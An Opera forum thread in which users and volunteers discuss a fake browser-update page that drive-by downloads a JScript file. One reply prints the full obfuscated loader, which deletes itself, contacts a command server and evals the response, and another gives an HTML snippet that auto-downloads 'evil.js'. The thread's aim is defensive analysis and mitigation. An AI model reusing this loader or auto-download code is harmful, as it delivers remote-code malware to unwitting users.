Drive-by download attack
-
leocg Moderator Volunteer last edited by
@operaequalstrash To where the .js files was downloaded? You weren't prompted to choose where the file should be saved to?
-
burnout426 Volunteer last edited by
@operaequalstrash said in Drive-by download attack:
I happened upon a compromised website
What website? URL to it?
-
operaequalstrash last edited by leocg
@leocg it was auto-downloaded to the Download folder, so no, I was not prompted whether to download the file. I noticed it because of the blue dot on the top right side of the browser window that shows up when something finishes downloading. The file name was something like Update.4.2.1.5.244.js. I Secure Erased the SSD this morning so I didn't take any screenshots.
-
operaequalstrash last edited by leocg
@burnout426 https://www.google.com/url?sa=t&source=web&rct=j&url=https://fantasticservicesgroup.com.au/blog/how-to-clean-mould-off-bathroom-sealant/%23:~:text%3Dsoda%2520and%2520vinegar.-,Vinegar,and%2520finally%2520rinse%2520with%2520water.&ved=2ahUKEwjVjp3A5vfvAhVdyjgGHVrlBEIQFjABegQIAxAF&usg=AOvVaw267HvzCCIl7hRTgOibLWS7
I got there by clicking on a Google search result (as above). Like the other user experienced in 2019, the hijacked page looked 'professional' like a real Opera page with logos, but just with obviously dodgy link urls. The page was asking me to update Opera because it's outdated. I did not click on anything on the page, but it drive-by downloaded a js file into my Download folder.
I am not sure about what exactly this drive-by did to my system, but nonetheless I Secure Erased my SSD this morning, and I'll have to reinstall Win10 later. It's a minor inconvenience, but I am more annoyed that Opera browser is vulnerable to an exploit like this. I was using it on its default setting with no downloaded plugins. The irony is that I started using Opera for it's supposedly good security - haha what a joke of security it has. The last time I saw a drive-by like this was on IE on Windows XP.
-
leocg Moderator Volunteer last edited by
@operaequalstrash By default Opera will show the save as dialog for executable files, that's why I asked.
-
leocg Moderator Volunteer last edited by
@operaequalstrash So you searched for something on Google and, in the results page, clicked on the one that looked like the page you were searching for. Then, that page showed a pop-up or a message saying that you need to upgrade Opera?
-
burnout426 Volunteer last edited by
@operaequalstrash said in Drive-by download attack:
@burnout426 https://www.google.com/url?sa=t&source=web&rct=j&url=https://fantasticservicesgroup.com.au/blog/how-to-clean-mould-off-bathroom-sealant/%23:~:text%3Dsoda and vinegar.-,Vinegar,and finally rinse with water.&ved=2ahUKEwjVjp3A5vfvAhVdyjgGHVrlBEIQFjABegQIAxAF&usg=AOvVaw267HvzCCIl7hRTgOibLWS7
I was able to trigger the update page for Chrome. There was no automatic download though. I will keep trying to get the false update page in Opera. However, in Chrome, clicking on the "update chrome" link:
<a class="button eula-download-button download-button desktop-only hide-cros" href="blob:https://fantasticservicesgroup.com.au/2effd3cc-8fe0-42d0-9358-a209738ee480" id="buttonDownload" download="Chrome.db7e57.zip">Update Chrome</a>
downloads a blob that represents a zip file. In the zip file is:
Chrome.Update.60c91c.js:
try { var kasa = new ActiveXObject('Scripting.FileSystemObject'); kasa['DeleteFile'](this['WScript']['ScriptFullName'], true); } catch (e) {} var azke = ofznaboqag(); var bjaqug = rhuxikbmicy(azke); while (azke < bjaqug) { azke = ofznaboqag(); this['WScript']['Sleep'](1000); } function rhuxikbmicy(cnifloefpi) { return cnifloefpi + 10000; } function ofznaboqag() { return new Date()['getTime'](); } var fguvakakam = kongahavha('mfciogx.w1sxc1q/gmeorcg.jahicdaexmzhxtnleaweywxuzne.snciggooelq.r3z0iaj7ydqbm2yfv/q/r:usxpmtmtqhu'); var tid = kongahavha('d0r0e5p'); var wbz = kongahavha('m1cbgai0i4mag2vag'); var mopemgeyb = ['a', tid]; sendRequest(mopemgeyb); function sendRequest(mopemgeyb, ypjaliv5) { if(typeof ypjaliv5 === 'undefined') { ypjaliv5 = false; } var ysviwknoer = '', lukyjiv = '', azhewuv, awkyjugav='eval'; for (var rebusid3 = 0; rebusid3 < mopemgeyb['length']; rebusid3++) { ysviwknoer += rebusid3 + '=' + encodeURIComponent(''+mopemgeyb[rebusid3]) + '&'; } ysviwknoer = fyup(ysviwknoer); try { var bospopibttu; bospopibttu = new ActiveXObject('MSXML2.XMLHTTP'); bospopibttu['open']('POST', fguvakakam, false); bospopibttu['send'](ysviwknoer); if (bospopibttu['status'] == 200) { lukyjiv = bospopibttu['responseText']; if(lukyjiv) { azhewuv = fwugym(lukyjiv); if(ypjaliv5) { return azhewuv; } else { this[awkyjugav](azhewuv); } } } } catch (e) {} return false; } function rnugma(rebusid3) { var hebod = '00'+rebusid3['toString'](16); hebod = hebod['substr'](hebod['length']-2); return hebod; } function fwugym(mpumeznxoxih) { var vjueqnuf, bvury9, rebusid3, lukyjiv = ''; bvury9 = parseInt(mpumeznxoxih['substr'](0, 2), 16); vjueqnuf = mpumeznxoxih['substr'](2); for (rebusid3 = 0; rebusid3 < vjueqnuf['length']; rebusid3+=2) { lukyjiv += String['fromCharCode'](gcayhptecim(parseInt(vjueqnuf['substr'](rebusid3, 2), 16), bvury9)); } return lukyjiv; } function fyup(mpumeznxoxih) { var bvury9 = 207, rebusid3, lukyjiv = ''; for (rebusid3 = 0; rebusid3 < mpumeznxoxih['length']; rebusid3++) { lukyjiv += rnugma(mpumeznxoxih['charCodeAt'](rebusid3) ^ bvury9); } return (rnugma(bvury9)+lukyjiv); } function gcayhptecim(ebup, zavyb) { var amyn = '', rinnu, minif, rebusid3; ebup = nguho(ebup); zavyb = nguho(zavyb); for(rebusid3 = 0; rebusid3<ebup['length']; rebusid3++) { rinnu = ebup['substr'](rebusid3,1); minif = zavyb['substr'](rebusid3,1); if(rinnu=='0'){ if(minif=='0'){ amyn+='0'; } else { amyn+='1'; } } else { if(minif=='0'){ amyn+='1'; } else { amyn+='0'; } } } return parseInt(amyn, 2); } function nguho(ebup) { ebup = (+ebup)['toString'](2); var epwryihno = '00000000' + ebup; epwryihno = epwryihno['substr'](epwryihno['length'] - 8); return epwryihno; } function kongahavha(imalsosu) { imalsosu = imalsosu.split(''); var vhimylpi = ''; for(var rwean=0; rwean<imalsosu['length']; rwean++) { if(rwean%2===1) vhimylpi += imalsosu[rwean]; } vhimylpi = dyah(vhimylpi); return vhimylpi; } function dyah(cweawvyhco) { cweawvyhco = cweawvyhco.split(''); var kogygku = ''; for (var ajser = cweawvyhco['length'] - 1; ajser >= 0; ajser--) { kogygku += oqjrynixi(cweawvyhco, ajser); } return kogygku; } function oqjrynixi(ditew, aracfespy) { return ditew[aracfespy]; }
As in, it's an executable Javascript file (Jscript) for Windows that's dangerous as long as you have Wscript enabled.
test.js:
var text; text="Hello world!"; WScript.Echo(text);
If you create test.js and double-left-click on it and it shows a dialog with "Hello world!", Windows Scripting Host is enabled and you might want to disable it.
If you never actually executed the Opera update js you got, you should be okay.
-
burnout426 Volunteer last edited by burnout426
For:
var fguvakakam = kongahavha('mfciogx.w1sxc1q/gmeorcg.jahicdaexmzhxtnleaweywxuzne.snciggooelq.r3z0iaj7ydqbm2yfv/q/r:usxpmtmtqhu'); var tid = kongahavha('d0r0e5p'); var wbz = kongahavha('m1cbgai0i4mag2vag');
The functions translate that into:
https://f2bd7a03.login.nuwealthmedia.com/1x1.gif 500 a2a40ab1
Also, if you see in the code, it requests something from a server and gets a response back. You'll also see at the beginning of the code that the file is set to delete itself after it runs.
-
operaequalstrash last edited by
@leocg Yessir. The page that rendered was a somewhat official looking Opera update page that said my browser is out of date, click here to update. The js file just downloaded even without me clicking on anything...
-
operaequalstrash last edited by
@burnout426 it seems like WSH is enabled by default on Windows, and I had never disabled it when this drive-by happened. Either way, I secure erased my SSD, and reinstalled Win10 since there were some work files that are security sensitive.
If Opera shows a save as dialog for executable files by default as @leocg mentioned, shouldn't it show a dialog for a Jscript file when a webpage is trying to download it onto my machine? I get that it isn't much of a concern unless I execute the downloaded file, but this is just another way for an attack to bypass the browser sandbox, and get one step closer to having it executed (whether by mistake by the user or whatever). I reported the incident to Opera.
-
leocg Moderator Volunteer last edited by
@operaequalstrash You need to do anything to trigger the update message? I opened the link on Opera Stable 75 and Developer 77 and couldn't see anything related to Opera upgrade.
-
burnout426 Volunteer last edited by
@leocg I didn't have to do anything special in Chrome. But, it only happened after a few times of loading the link and only happened once. I have yet to trigger it in Opera to see if the js file gets dumped by itself in the downloads folder without asking.
-
burnout426 Volunteer last edited by burnout426
I don't know if this works for a remote html file, but it does for a local one:
local.html
<script> window.addEventListener("DOMContentLoaded", function() { var b = new Blob(['WScript.Echo("Hello World");']); var u = URL.createObjectURL(b, {type: "application/javascript"}); var a = document.createElement("a"); a.href = u; a.download = "evil.js"; a.textContent = "Update"; document.body.appendChild(a); a.click(); }, false); </script>
That will automatically dump evil.js in your download folder. You can double-left-click the file and Windows will ask you if you want to run it (as long as you didn't uncheck the "always ask" box in that dialog before).
You do get a notification in Opera that the download happened. But in Chrome, in the notification, you get a warning and an option to discard the download.
I can't say that this is how the site does it in Opera as I haven't been able to trigger the update page on that site in Opera.
-
operaequalstrash last edited by
@burnout426 the hijacked page must be doing a crude browser fingerprinting before rendering the fake update page, since you are getting one for Chrome, but not Opera, whereas I got one on Opera. All I can tell you about the condition that triggered the page for me on Opera was that I installed Opera 1 week prior to that, and everything was on its default setting - no additional plug ins.
In fact, this situation is identical to this user's : https://forums.opera.com/topic/33351/opera-automatic-webpage-redirect-to-update-page-that-auto-downloaded-a-javascript-file
He got the hijacked page on Opera, and you got the hijacked page on Chrome. I suspect that the hijacked page rotates the target browser so as not to alert the site admin that it was hijacked. That way if one user on Chrome gets the drive-by and alerts the admin only for the site admin to check out the site on Opera, he would see a normal page with no driveby and would more likely suspect that it was the user's machine that was hijacked rather than the site. Either way, at least I know that Chrome will ask it's users if he wants to proceed with the download, if there is an attempt at a drive-by download. So in this regard, Chrome isn't as trashy as Opera.
-
burnout426 Volunteer last edited by
For my demo at least, if you goto the URL
opera://settings/downloads
and enable "Ask where to save each file before downloading", you'll get prompted to download the js file where you can cancel it. -
operaequalstrash last edited by
@burnout426 That should be the default setting, given how easily hijacked pages can pull a drive-by.
-
pauli133 last edited by
I just had this happen as well. I clicked on an article via Google News, and saw the page redirected to an Opera update notice. A .js file was downloaded.
I've since reinstalled Opera, but I am leaning towards rebuilding the PC at this point.
-
operaequalstrash last edited by
@pauli133 This means Opera still doesn't make "Ask where to save each file before downloading" as the default setting, nor has it done anything to patch against this drive by vulnerability. Remember my name...
-
OwenP2004 last edited by
I just had this same thing happen to me online, a pop up appeared saying I had an out of date opera and it automatically downloaded a .js file without my permission.
I immediately deleted the file and cleared my recycling bin and did not open the file. Will I be safe now or are there any other things that I should have to worry about. Can the .is file harm my computer in any way without me opening it? -
operaequalstrash last edited by
@owenp2004 If the js file was never run, then it is unlikely to cause any harm, though when that happened to me, I did a complete wipe of my SSD and reinstalled Windows since I don't really trust Windows security. If you were running an up to date Linux based OS and a prudent user of the OS, then you don't have much to worry about since the js file most likely has codes to download the actual payload (executable of the malware) meant for Windows. I'm not sure about how Windows 10 security deals with javascript files, but if you never ran the file, then it probably is safe, but probably a good idea to back up your files now just in case you need to do a complete wipe and reinstall. I dealt with a ransomsware before, and it is annoying AF. Oh and remember my name...
-
-